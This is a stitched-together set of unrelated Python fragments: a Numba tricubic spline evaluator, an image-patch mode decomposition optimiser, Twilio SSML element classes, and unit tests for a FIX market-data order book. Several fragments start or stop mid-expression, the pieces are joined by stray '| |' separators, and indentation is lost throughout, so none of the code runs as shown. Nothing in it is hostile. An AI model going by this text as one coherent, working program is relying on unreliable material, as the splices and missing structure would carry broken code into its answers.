Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3])
)
)
+ Phi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3])
)
)
)
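# The fully unrolled expression above is the tensor-product cubic spline evaluation
#     values[n] = sum_{a,b,c = 0..3} Phi0_a * Phi1_b * Phi2_c * coefs[i0+a, i1+b, i2+c]
# where Phi{d}_k = Ad[k,0]*t_d^3 + Ad[k,1]*t_d^2 + Ad[k,2]*t_d + Ad[k,3] is the k-th
# cubic basis function evaluated at the fractional offset t_d inside cell i_d.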
@njit(cache=True)
def vec_eval_cubic_spline_3_inlined_lesswork(orders, coefs, points, values, Ad, dAd):
N = points.shape[0]
M0 = orders[0]
# start0 = a[0]
# dinv0 = (orders[0]-1.0)/(b[0]-a[0])
M1 = orders[1]
# start1 = a[1]
# dinv1 = (orders[1]-1.0)/(b[1]-a[1])
M2 = orders[2]
# start2 = a[2]
# dinv2 = (orders[2]-1.0)/(b[2]-a[2])
for n in range(N):
u0 = points[n, 0]
u1 = points[n, 1]
u2 = points[n, 2]
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
i2 = int(floor(u2))
i2 = max(min(i2, M2 - 2), 0)
t2 = u2 - i2
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
tp2_0 = t2 * t2 * t2
tp2_1 = t2 * t2
tp2_2 = t2
tp2_3 = 1.0
Phi0_0 = (
Ad[0, 0] * tp0_0 + Ad[0, 1] * tp0_1 + Ad[0, 2] * tp0_2 + Ad[0, 3] * tp0_3
)
Phi0_1 = (
Ad[1, 0] * tp0_0 + Ad[1, 1] * tp0_1 + Ad[1, 2] * tp0_2 + Ad[1, 3] * tp0_3
)
Phi0_2 = (
Ad[2, 0] * tp0_0 + Ad[2, 1] * tp0_1 + Ad[2, 2] * tp0_2 + Ad[2, 3] * tp0_3
)
Phi0_3 = (
Ad[3, 0] * tp0_0 + Ad[3, 1] * tp0_1 + Ad[3, 2] * tp0_2 + Ad[3, 3] * tp0_3
)
Phi1_0 = (
Ad[0, 0] * tp1_0 + Ad[0, 1] * tp1_1 + Ad[0, 2] * tp1_2 + Ad[0, 3] * tp1_3
)
Phi1_1 = (
Ad[1, 0] * tp1_0 + Ad[1, 1] * tp1_1 + Ad[1, 2] * tp1_2 + Ad[1, 3] * tp1_3
)
Phi1_2 = (
Ad[2, 0] * tp1_0 + Ad[2, 1] * tp1_1 + Ad[2, 2] * tp1_2 + Ad[2, 3] * tp1_3
)
Phi1_3 = (
Ad[3, 0] * tp1_0 + Ad[3, 1] * tp1_1 + Ad[3, 2] * tp1_2 + Ad[3, 3] * tp1_3
)
Phi2_0 = (
Ad[0, 0] * tp2_0 + Ad[0, 1] * tp2_1 + Ad[0, 2] * tp2_2 + Ad[0, 3] * tp2_3
)
Phi2_1 = (
Ad[1, 0] * tp2_0 + Ad[1, 1] * tp2_1 + Ad[1, 2] * tp2_2 + Ad[1, 3] * tp2_3
)
Phi2_2 = (
Ad[2, 0] * tp2_0 + Ad[2, 1] * tp2_1 + Ad[2, 2] * tp2_2 + Ad[2, 3] * tp2_3
)
Phi2_3 = (
Ad[3, 0] * tp2_0 + Ad[3, 1] * tp2_1 | |
of vectors
KL1 = get_KL(abs_sources[i,:], abs_sources[j,:])
KL2 = get_KL(abs_sources[j,:], abs_sources[i,:])
# Store symmetrised KL-divergence
pair_index = next(ind)
divergences[pair_index] = KL1 + KL2
return divergences
def err(sources, source_cov):
"""
Extract the error vector, F, of all errors to be minimised in the
numerical search procedure.
Parameters
----------
sources : numpy array (floats)
The {NUM_MODES x NUM_PATCHES} array of sources.
source_cov : numpy array (floats)
The {NUM_MODES x NUM_MODES} covariance array between all modes.
Returns
-------
F : numpy array (floats)
Column vector of all errors.
"""
# The target source covariance array is the identity
I = np.eye(source_cov.shape[0])
cov_err_real = (source_cov.real - I).flatten()
cov_err_imag = source_cov.imag.flatten()
# The target symmetric divergence between all modes is 2
TARGET_DIVERGENCE = 2.
divergences = pairwise_modal_divergences(sources)
divergence_err = divergences - TARGET_DIVERGENCE
F = np.vstack((cov_err_real[:, np.newaxis],\
cov_err_imag[:, np.newaxis],\
divergence_err[:, np.newaxis]))
return F
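# Size check (illustrative, assuming pairwise_modal_divergences returns one value per
# unordered pair of modes): with m = NUM_MODES, cov_err_real and cov_err_imag each
# contribute m*m entries and divergence_err contributes m*(m-1)/2, so F has
# 2*m*m + m*(m-1)/2 rows, e.g. 87 rows for m = 6.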
def jac(w, centred_img_patches, F, NUM_MODES):
"""
The Jacobian of the numerical search procedure.
Parameters
----------
w : numpy array (floats)
Column vector of model weights, used to construct mapping.
centred_img_patches : numpy array (floats)
The mean-centred {p x NUM_PATCHES} array of p-elements image patches.
F : numpy array (floats)
Column vector of all errors.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
Returns
-------
J : numpy array (floats)
The Jacobian for the current error vector and set of weights.
"""
# Initialise numerical perturbation and Jacobian array
PERT = 1e-15
num_var = w.size
num_err = F.size
J = np.zeros([num_err, num_var])
# Iterate over all weights and populate Jacobian
for i in range(num_var):
w_pert = w.copy()
w_pert[i] = w[i] + PERT
inverse_mapping_pert = generate_inverse_mapping(w_pert, centred_img_patches, NUM_MODES)
sources_pert = map_patches_to_sources(inverse_mapping_pert, centred_img_patches)
source_cov_pert = cov(sources_pert)
dF = err(sources_pert, source_cov_pert) - F
J[:,[i]] = dF/PERT
return J
def progress(err_vec, iteration, total_iterations):
"""
Print the progress of the iterative numerical search procedure.
Parameters
----------
err_vec : numpy array (float)
Column vector of all errors.
iteration : int
Current iteration.
total_iterations : int
Total number of iterations.
"""
normed_err = np.linalg.norm(err_vec, 2)
perc_progress = 100*(iteration+1)/total_iterations
# Format and print progress to the console
sys.stdout.write('\r ERROR: %.2f | PROGRESS: %d/%d [%d%%] '
% (normed_err, iteration+1, total_iterations, perc_progress)
)
sys.stdout.flush()
def save_model(SAVE_DIR, inverse_mapping, PATCH_DIM, NUM_MODES):
"""
Save model to a given directory, SAVE_DIR. If save path does not exist,
the directory will be created.
Parameters
----------
SAVE_DIR : text
Path of save directory.
inverse_mapping :numpy array (floats)
The {NUM_MODES x p} matrix transform that maps the image patches to
the desired sources.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
"""
if not os.path.isdir(SAVE_DIR):
os.mkdir(SAVE_DIR)
np.savetxt(SAVE_DIR+'real.csv', inverse_mapping.real, delimiter=',', fmt='%1.21f')
np.savetxt(SAVE_DIR+'imag.csv', inverse_mapping.imag, delimiter=',', fmt='%1.21f')
np.savetxt(SAVE_DIR+'patch_dim.csv', PATCH_DIM, delimiter=',', fmt='%i')
np.savetxt(SAVE_DIR+'num_modes.csv', np.array([NUM_MODES]), fmt='%i')
def load_model(LOAD_DIR):
"""
Load model from a given directory, LOAD_DIR.
Parameters
----------
LOAD_DIR : text
Path of load directory.
Returns
-------
inverse_mapping :numpy array (floats)
The {NUM_MODES x p} matrix transform that maps the image patches to
the desired sources.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
"""
inverse_mapping_real = np.loadtxt(LOAD_DIR+'real.csv', delimiter=',')
inverse_mapping_imag = np.loadtxt(LOAD_DIR+'imag.csv', delimiter=',')
inverse_mapping = inverse_mapping_real + 1j*inverse_mapping_imag
PATCH_DIM = list(np.loadtxt(LOAD_DIR+'patch_dim.csv').astype(int))
NUM_MODES = int(np.loadtxt(LOAD_DIR+'num_modes.csv'))
return inverse_mapping, PATCH_DIM, NUM_MODES
def extract_all_patches_from_img(I, PATCH_DIM):
"""
Beginning from the top-left corner of the image, I, extract all image
patches of shape, PATCH_DIM, that can be yielded by scanning top-to-bottom
and left-to-right. The image is not padded, and thus the total sample of
patches will generate a truncated version of I along the bottom-most and
right-most border. The number of truncated pixels is determined by the
patch size given by PATCH_DIM.
Parameters
----------
I : numpy array (floats)
Normalise image with values in range {0,1}.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
Returns
-------
all_patches : numpy array (floats)
The array of dimensions {p x n}, where p is the number of pixel values
in a patch, and n is the total number of patches that can be extracted
from I. This array thus stores all patches by column in vector form.
num_patches_in_x : int
Number of patches that can fit along the width of I.
num_patches_in_y : int
Number of patches that can fit along the height of I.
"""
# The right- and bottom-most limit for the top-left corner of patch
xrange = np.arange(I.shape[1] - PATCH_DIM[1])
yrange = np.arange(I.shape[0] - PATCH_DIM[0])
# The number of patches that can be fit into the width and height of I
num_patches_in_x = xrange.size
num_patches_in_y = yrange.size
# The total number of patches that can be extracted from I
total_num_patches = num_patches_in_x * num_patches_in_y
# Initialise array of all vectorised patches
all_patches = np.zeros([np.prod(PATCH_DIM), total_num_patches])
# Define an index iterator
def iterate_ind():
ind = 0
while True:
yield ind
ind +=1
# Iterate over all permissable locations in I and extract patches in
# row-major order, to comply with the numpy convention
i = iterate_ind()
for y in range(num_patches_in_y):
for x in range(num_patches_in_x):
patch_xinds = np.arange(xrange[x], xrange[x] + PATCH_DIM[1])
patch_yinds = np.arange(yrange[y], yrange[y] + PATCH_DIM[0])
patch_ind = next(i)
all_patches[:, patch_ind] = I[patch_yinds[:,np.newaxis], patch_xinds, :].flatten()
return all_patches, num_patches_in_x, num_patches_in_y
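# Worked example (illustrative): for a 64 x 64 RGB image and PATCH_DIM = [8, 8, 3],
# xrange and yrange each have 64 - 8 = 56 entries, so all_patches has shape
# (8*8*3, 56*56) = (192, 3136), with each patch flattened into a column, scanned
# left-to-right within each row and rows top-to-bottom.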
def im_shift_norm(I):
"""
Given an image, I, scale all pixels such that the {min, max} of the entire
image is remapped to the range {0,1}.
Parameters
----------
I : numpy array (floats)
Image array with arbitrary min and max pixel value.
Returns
-------
numpy array (floats)
Image with remapped values such that min(I) = 0 and max(I) = 1.
"""
if I.dtype != float:
    # astype returns a new array; rebind the local name so the cast takes effect
    I = I.astype(float)
return (I - np.min(I)) / (np.max(I) - np.min(I))
def visualise_solution(I, inverse_mapping, PATCH_DIM, NUM_MODES):
"""
Given the model variables, output the stack of all modal images derived
from the absolute magnitude of the image source array, as well as the final
appropriately rescaled sum over all modal images.
Parameters
----------
I : numpy array (floats)
Normalise image into range {0,1}.
inverse_mapping : numpy array (floats)
The {NUM_MODES x p} matrix transform that maps the image patches to
the desired sources.
PATCH_DIM : numpy array (int)
Array of shape {H x W x C} that defines the height, H, width, W, and
number, C, of colour channels for an image patch.
NUM_MODES : int
Number of independent modes into which the image will be decomposed.
Returns
-------
final_img : numpy array (floats)
The rescaled sum of all modal images.
modal_images : numpy array (floats)
The stack of all modal images, derived from the absolute values of the
source modes.
"""
# Extract all patches from the image
all_img_patches, num_patches_in_x, num_patches_in_y = \
extract_all_patches_from_img(I, PATCH_DIM)
# Centre all patches onto the mean image patch
all_img_patches_centred = mean_centred_img_patches(all_img_patches)
# Map all image patches onto source modes
all_sources = map_patches_to_sources(inverse_mapping, all_img_patches_centred)
# Initialise the stack of all source mode images
modal_images = np.zeros([num_patches_in_y, num_patches_in_x, NUM_MODES])
# Extract the images generated by the absolute magnitudes of the source modes
for i in range(NUM_MODES):
modal_images[:,:,i] = np.reshape(np.abs(all_sources[i,:]),
[num_patches_in_y, num_patches_in_x])
# Generate the summed image over all modes
summed_modes = np.sum(modal_images, axis=2)
# Shift and normalise the values of the final summed greyscale image
final_img = im_shift_norm(summed_modes)
| |
element
"""
return self.sub(words, alias=alias, **kwargs)
def w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.nest(SsmlW(words=words, role=role, **kwargs))
@deprecated_method('w')
def ssml_w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.w(words=words, role=role, **kwargs)
class SsmlPhoneme(TwiML):
""" Using Phonetic Pronunciation in <Say> """
def __init__(self, words, **kwargs):
super(SsmlPhoneme, self).__init__(**kwargs)
self.name = 'phoneme'
self.value = words
class SsmlLang(TwiML):
""" Specifying Another Language for Specific Words in <Say> """
def __init__(self, words=None, **kwargs):
super(SsmlLang, self).__init__(**kwargs)
self.name = 'lang'
if words:
self.value = words
def break_(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.nest(SsmlBreak(strength=strength, time=time, **kwargs))
@deprecated_method('break_')
def ssml_break(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.break_(strength=strength, time=time, **kwargs)
def emphasis(self, words=None, level=None, **kwargs):
"""
Create a <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.nest(SsmlEmphasis(words=words, level=level, **kwargs))
@deprecated_method('emphasis')
def ssml_emphasis(self, words=None, level=None, **kwargs):
"""
Create a <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.emphasis(words=words, level=level, **kwargs)
def lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml:lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.nest(SsmlLang(words=words, xml_lang=xml_lang, **kwargs))
@deprecated_method('lang')
def ssml_lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml:lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.lang(words=words, xml_lang=xml_lang, **kwargs)
def p(self, words=None, **kwargs):
"""
Create a <P> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <P> element
"""
return self.nest(SsmlP(words=words, **kwargs))
@deprecated_method('p')
def ssml_p(self, words=None, **kwargs):
"""
Create a <P> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <P> element
"""
return self.p(words=words, **kwargs)
def phoneme(self, words, alphabet=None, ph=None, **kwargs):
"""
Create a <Phoneme> element
:param words: Words to speak
:param alphabet: Specify the phonetic alphabet
:param ph: Specify the phonetic symbols for pronunciation
:param kwargs: additional attributes
:returns: <Phoneme> element
"""
return self.nest(SsmlPhoneme(words, alphabet=alphabet, ph=ph, **kwargs))
@deprecated_method('phoneme')
def ssml_phoneme(self, words, alphabet=None, ph=None, **kwargs):
"""
Create a <Phoneme> element
:param words: Words to speak
:param alphabet: Specify the phonetic alphabet
:param ph: Specify the phonetic symbols for pronunciation
:param kwargs: additional attributes
:returns: <Phoneme> element
"""
return self.phoneme(words, alphabet=alphabet, ph=ph, **kwargs)
def prosody(self, words=None, volume=None, rate=None, pitch=None, **kwargs):
"""
Create a <Prosody> element
:param words: Words to speak
:param volume: Specify the volume, available values: default, silent, x-soft, soft, medium, loud, x-loud, +ndB, -ndB
:param rate: Specify the rate, available values: x-slow, slow, medium, fast, x-fast, n%
:param pitch: Specify the pitch, available values: default, x-low, low, medium, high, x-high, +n%, -n%
:param kwargs: additional attributes
:returns: <Prosody> element
"""
return self.nest(SsmlProsody(words=words, volume=volume, rate=rate, pitch=pitch, **kwargs))
@deprecated_method('prosody')
def ssml_prosody(self, words=None, volume=None, rate=None, pitch=None,
**kwargs):
"""
Create a <Prosody> element
:param words: Words to speak
:param volume: Specify the volume, available values: default, silent, x-soft, soft, medium, loud, x-loud, +ndB, -ndB
:param rate: Specify the rate, available values: x-slow, slow, medium, fast, x-fast, n%
:param pitch: Specify the pitch, available values: default, x-low, low, medium, high, x-high, +n%, -n%
:param kwargs: additional attributes
:returns: <Prosody> element
"""
return self.prosody(words=words, volume=volume, rate=rate, pitch=pitch, **kwargs)
def s(self, words=None, **kwargs):
"""
Create a <S> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <S> element
"""
return self.nest(SsmlS(words=words, **kwargs))
@deprecated_method('s')
def ssml_s(self, words=None, **kwargs):
"""
Create a <S> element
:param words: Words to speak
:param kwargs: additional attributes
:returns: <S> element
"""
return self.s(words=words, **kwargs)
def say_as(self, words, interpret_as=None, role=None, **kwargs):
"""
Create a <Say-As> element
:param words: Words to be interpreted
:param interpret-as: Specify the type of words being spoken
:param role: Specify the format of the date when interpret-as is set to date
:param kwargs: additional attributes
:returns: <Say-As> element
"""
return self.nest(SsmlSayAs(words, interpret_as=interpret_as, role=role, **kwargs))
@deprecated_method('say_as')
def ssml_say_as(self, words, interpret_as=None, role=None, **kwargs):
"""
Create a <Say-As> element
:param words: Words to be interpreted
:param interpret-as: Specify the type of words being spoken
:param role: Specify the format of the date when interpret-as is set to date
:param kwargs: additional attributes
:returns: <Say-As> element
"""
return self.say_as(words, interpret_as=interpret_as, role=role, **kwargs)
def sub(self, words, alias=None, **kwargs):
"""
Create a <Sub> element
:param words: Words to be substituted
:param alias: Substitute a different word (or pronunciation) for selected text such as an acronym or abbreviation
:param kwargs: additional attributes
:returns: <Sub> element
"""
return self.nest(SsmlSub(words, alias=alias, **kwargs))
@deprecated_method('sub')
def ssml_sub(self, words, alias=None, **kwargs):
"""
Create a <Sub> element
:param words: Words to be substituted
:param alias: Substitute a different word (or pronunciation) for selected text such as an acronym or abbreviation
:param kwargs: additional attributes
:returns: <Sub> element
"""
return self.sub(words, alias=alias, **kwargs)
def w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.nest(SsmlW(words=words, role=role, **kwargs))
@deprecated_method('w')
def ssml_w(self, words=None, role=None, **kwargs):
"""
Create a <W> element
:param words: Words to speak
:param role: Customize the pronunciation of words by specifying the word’s part of speech or alternate meaning
:param kwargs: additional attributes
:returns: <W> element
"""
return self.w(words=words, role=role, **kwargs)
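# A minimal usage sketch (illustrative; assumes the enclosing <Say> verb from the full
# twilio-python library, which exposes the same nesting helpers as the classes here):
#
#   from twilio.twiml.voice_response import VoiceResponse
#   response = VoiceResponse()
#   say = response.say('')
#   lang = say.lang('Bonjour, mes amis !', xml_lang='fr-FR')
#   lang.break_(strength='strong', time='500ms')
#   print(response)   # roughly: <Say><lang xml:lang="fr-FR">Bonjour, ...<break .../></lang></Say>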
class SsmlP(TwiML):
""" Adding a Pause Between Paragraphs in <Say> """
def __init__(self, words=None, **kwargs):
super(SsmlP, self).__init__(**kwargs)
self.name = 'p'
if words:
self.value = words
def break_(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.nest(SsmlBreak(strength=strength, time=time, **kwargs))
@deprecated_method('break_')
def ssml_break(self, strength=None, time=None, **kwargs):
"""
Create a <Break> element
:param strength: Set a pause based on strength
:param time: Set a pause to a specific length of time in seconds or milliseconds, available values: [number]s, [number]ms
:param kwargs: additional attributes
:returns: <Break> element
"""
return self.break_(strength=strength, time=time, **kwargs)
def emphasis(self, words=None, level=None, **kwargs):
"""
Create an <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.nest(SsmlEmphasis(words=words, level=level, **kwargs))
@deprecated_method('emphasis')
def ssml_emphasis(self, words=None, level=None, **kwargs):
"""
Create an <Emphasis> element
:param words: Words to emphasize
:param level: Specify the degree of emphasis
:param kwargs: additional attributes
:returns: <Emphasis> element
"""
return self.emphasis(words=words, level=level, **kwargs)
def lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml_lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.nest(SsmlLang(words=words, xml_lang=xml_lang, **kwargs))
@deprecated_method('lang')
def ssml_lang(self, words=None, xml_lang=None, **kwargs):
"""
Create a <Lang> element
:param words: Words to speak
:param xml_lang: Specify the language
:param kwargs: additional attributes
:returns: <Lang> element
"""
return self.lang(words=words, xml_lang=xml_lang, **kwargs)
def phoneme(self, words, alphabet=None, ph=None, **kwargs):
"""
Create a <Phoneme> element
:param words: Words to speak
:param alphabet: Specify the phonetic alphabet
:param | |
book['ask_px1'])
self.assertEqual(0, book['ask_size1'])
self.assertEqual(b'', book['ask_provider1'][0])
np.savetxt('/tmp/book_eurusd_0014.csv', book, delimiter=',', fmt='%s')
# 7.) w <- different price/feed/quantity - all combinations as in i
# USD/CAD
# bids | asks
# [0] 2300000 @ 1.37 lp1 | [0] 1200000 @ 1.39 lp0
# [1] 2300000 @ 1.36 lp0 | [1] 1200000 @ 1.40 lp1
def test_snapshot_change_all_prices_sizes_and_providers(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.47, 'size': 2200000.0, 'provider': '0', 'time': 1616965217168000},
'S0': {'entry_type': 1, 'price': 1.49, 'size': 1100000.0, 'provider': '0', 'time': 1616965217168000},
'B1': {'entry_type': 0, 'price': 1.46, 'size': 2200000.0, 'provider': '1', 'time': 1616965217168000},
'S1': {'entry_type': 1, 'price': 1.49, 'size': 1100000.0, 'provider': '1', 'time': 1616965217168000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.180|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.37|271=2300000|299=0|106=1|269=1|270=1.40|271=1200000|299=0|106=1|269=0|270=1.36|271=2300000|299=1|106=0|269=1|270=1.39|271=1200000|299=1|106=0|10=169|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217180000, 'USDCAD', [
['0', 2300000.0, 1200000.0, 1.37, 1.40, '1', '1'],
['1', 2300000.0, 1200000.0, 1.36, 1.39, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217180000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217180000, book['time'])
# check bids
self.assertEqual(1616965217180000, book['bid_time0'])
self.assertEqual(1.37, book['bid_px0'])
self.assertEqual(2300000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(1616965217180000, book['bid_time1'])
self.assertEqual(1.36, book['bid_px1'])
self.assertEqual(2300000, book['bid_size1'])
self.assertEqual(b'0', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217180000, book['ask_time0'])
self.assertEqual(1.39, book['ask_px0'])
self.assertEqual(1200000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217180000, book['ask_time1'])
self.assertEqual(1.40, book['ask_px1'])
self.assertEqual(1200000, book['ask_size1'])
self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0015.csv', book, delimiter=',', fmt='%s')
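# Note on the queued item layout asserted throughout these tests (inferred
# from the assertions themselves rather than from separate documentation):
# each item is a tuple (timestamp_us, symbol, rows, is_snapshot), where every
# row has the form
#   [quote_id, bid_size, ask_size, bid_px, ask_px, bid_provider, ask_provider]
# and is_snapshot is True for 35=W market data snapshots and False for 35=i
# mass quotes.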
# USD/CAD
# bids | asks
# [0] 2100000*@ 1.37 lp1 | [0] 1400000*@ 1.39 lp0
# [1] 2200000*@ 1.36 lp0 | [1] 1300000*@ 1.40 lp1
def test_snapshot_change_all_sizes(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.37, 'size': 2300000.0, 'provider': '1', 'time': 1616965217180000},
'S0': {'entry_type': 1, 'price': 1.40, 'size': 1200000.0, 'provider': '1', 'time': 1616965217180000},
'B1': {'entry_type': 0, 'price': 1.36, 'size': 2300000.0, 'provider': '0', 'time': 1616965217180000},
'S1': {'entry_type': 1, 'price': 1.39, 'size': 1200000.0, 'provider': '0', 'time': 1616965217180000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.181|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.37|271=2100000|299=0|106=1|269=1|270=1.40|271=1300000|299=0|106=1|269=0|270=1.36|271=2200000|299=1|106=0|269=1|270=1.39|271=1400000|299=1|106=0|10=170|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217181000, 'USDCAD', [
['0', 2100000.0, 1300000.0, 1.37, 1.40, '1', '1'],
['1', 2200000.0, 1400000.0, 1.36, 1.39, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217181000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217181000, book['time'])
# check bids
self.assertEqual(1616965217181000, book['bid_time0'])
self.assertEqual(1.37, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(1616965217181000, book['bid_time1'])
self.assertEqual(1.36, book['bid_px1'])
self.assertEqual(2200000, book['bid_size1'])
self.assertEqual(b'0', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217181000, book['ask_time0'])
self.assertEqual(1.39, book['ask_px0'])
self.assertEqual(1400000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217181000, book['ask_time1'])
self.assertEqual(1.40, book['ask_px1'])
self.assertEqual(1300000, book['ask_size1'])
self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
# print(self.bookbuilder.quotes['USDCAD'])
np.savetxt('/tmp/book_usdcad_0016.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [0] 2200000 @ 1.35*lp1 | [0] 1400000 @ 1.35*lp0
# [1] 2100000 @ 1.35*lp0 | [1] 1300000 @ 1.35*lp1
def test_snapshot_change_all_prices(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.37, 'size': 2100000.0, 'provider': '1', 'time': 1616965217181000},
'S0': {'entry_type': 1, 'price': 1.40, 'size': 1300000.0, 'provider': '1', 'time': 1616965217181000},
'B1': {'entry_type': 0, 'price': 1.36, 'size': 2200000.0, 'provider': '0', 'time': 1616965217181000},
'S1': {'entry_type': 1, 'price': 1.39, 'size': 1400000.0, 'provider': '0', 'time': 1616965217181000}
}
